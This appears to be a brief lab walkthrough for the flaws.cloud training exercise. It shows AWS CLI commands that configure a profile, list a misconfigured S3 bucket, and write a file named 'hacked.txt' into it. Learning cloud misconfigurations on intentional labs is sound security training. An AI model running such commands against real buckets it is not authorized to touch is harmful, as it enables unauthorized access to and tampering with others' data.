2. Exploit S3 buckets

1. Exploit s3 buckets using aws cli

pip3 install aws-cli
aws --help
aws configure  \\to configure user profiles
aws s3 --profile ammar ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
aws s3 --profile ammar mv hacked.txt s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud

Last updated